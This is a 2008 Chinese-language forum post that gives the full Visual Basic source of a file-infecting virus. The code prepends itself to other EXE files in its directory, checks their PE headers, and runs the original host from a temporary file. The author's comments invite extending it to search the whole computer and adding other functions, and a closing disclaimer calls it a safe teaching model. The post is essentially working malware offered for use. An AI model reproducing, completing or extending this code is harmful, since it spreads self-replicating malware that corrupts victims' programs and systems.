wangyucheng20 平民
帖子数 : 11 年龄 : 34 地点 : 广东南雄邓坊 精华贴 : 威望 : 勋章 : 注册日期 : 08-01-29
| 主题: VB的一个可以感染EXE的病毒原代码 2008-02-01, 21:44 | |
| 什么控件都不用加,直接输入以下代码就行了。Option ExplicitPrivate Victim As String '要感染的文件的名字Private HostLen As Long '要感染的文件的大小Private vbArray() As Byte '病毒的代码Private hArray() As Byte '要感染的文件的代码Private lenght As LongPrivate MySize As Integer '病毒的大小Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As LongPrivate Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As LongPrivate Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As LongPrivate iResult As LongPrivate hProg As LongPrivate idProg As LongPrivate iExit As LongConst STILL_ACTIVE As Long = &H103Const PROCESS_ALL_ACCESS As Long = &H1F0FFFPrivate Sub form_Initialize()Dim i As LongOn Error GoTo vbVerror '出错处理'原理:将生成病毒文件的代码读出,粘在要被感染的文件的后面。Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read _As #1ReDim MyArray(LOF(1) - 1)MySize = LOF(1)ReDim vbArray(MySize)Get #1, 1, vbArrayClose #1'这是在读自己的代码Victim = Dir(App.Path & "\" & "*.EXE") '随便选一个文件(目前只是在病毒所在的目录下随机选一个,将来你可以修改,让它不断的循环搜索计算机上的所有文件。)While Victim <> ""If format(Victim, ">") <> format(App.EXEName & ".EXE", ">") ThenOpen App.Path & "\" & Victim For Binary Access Read As #1ReDim hArray(LOF(1))Get #1, 1, hArrayClose #1'读出病毒自身的代码If hArray(&H69) <> &H4D Theni = hArray(&H3C)If hArray(i) = &H50 ThenOpen App.Path & "\" & Victim For Binary Access Write As #1Put #1, , vbArrayPut #1, MySize, hArrayClose #1End If '要保证被感染的不是空文件(不是圈套)End IfEnd If'读出准备被感染的文件的代码Victim = Dir() 'NextWend'下面的工作是为了保证病毒不会重复感染一个文件,也不会自我感染。Open App.Path & "\" & App.EXEName & ".exe" For Binary Access Read As #1lenght = LOF(1) - MySizeIf lenght <> 0 ThenReDim vbArray(lenght - 1)Get #1, MySize, vbArrayClose #1Open App.Path & "\" & App.EXEName & ".eve" For Binary Access Write As #1Put #1, , vbArrayClose #1idProg = Shell(App.Path & "\" & App.EXEName & ".eve", vbNormalFocus)hProg = OpenProcess(PROCESS_ALL_ACCESS, False, idProg)GetExitCodeProcess hProg, iExitDo While iExit = STILL_ACTIVEDoEventsGetExitCodeProcess hProg, iExitLoopKill App.Path & "\" & App.EXEName & ".eve"ElseClose #1End IfEndvbVerror: '出错处理,空着就可以了End Sub[/hide] '还有其他的说明:'1、本代码目前仅是实验模型,给新手讲解原理之用,不会失控,绝对安全。'2、本代码仅实现了感染EXE的功能,其他的功能还须你自己加入。'3、为了目前的安全,本病毒只是在病毒所在的目录下随机选一个文件感染,你可以利用此功能来调试;将来你可以修改,让它不断的循环搜索计算机上的所有文件。'4、最重要的:不要搞恶意破坏,否则真进了监狱后果自负![/color] | |
|